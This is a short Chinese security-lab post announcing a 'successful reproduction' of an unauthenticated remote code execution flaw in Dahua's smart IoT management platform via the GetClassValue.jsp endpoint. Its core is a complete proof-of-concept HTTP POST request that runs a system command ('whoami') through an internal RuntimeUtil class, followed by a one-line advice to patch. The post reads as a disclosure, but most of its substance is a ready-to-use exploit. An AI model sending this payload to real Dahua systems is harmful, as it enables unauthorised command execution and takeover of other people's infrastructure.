【成功复现】大华智能物联综合管理平台远程代码执行漏洞
【成功复现】大华智能物联综合管理平台远程代码执行漏洞
奥村燐 弥天安全实验室 2025-01-03 10:50
网安引领时代,弥天点亮未来 ****
0x00漏洞描述
大华智能物联综合管理平台 GetClassValue.jsp 接口存在远程代码执行漏洞,未经身份验证的恶意攻击者可以利用该漏洞远程执行任意命令,获取系统权限。
0x01影响范围
该漏洞影响所有未更新修复补丁的大华智能物联综合管理平台版本。
0x02复现过程
POC
POST /evo-apigw/admin/API/Developer/GetClassValue.jsp HTTP/1.1
Host: xxxxxxxxxxxxxxxxxx
Content-Type: application/json
{"data": {"clazzName": "com.dahua.admin.util.RuntimeUtil", "methodName": "syncexecReturnInputStream", "fieldName": ["whoami"]}}
0x03修复方案
为防范该漏洞带来的安全风险,建议受影响的用户立即采取以下措施:
官方修复:请尽快联系大华官方获取漏洞解决方案及升级补丁,确保平台安全。
知识分享完了喜欢别忘了关注我们哦~学海浩茫,予以风动,必降弥天之润! 弥 天安全实验室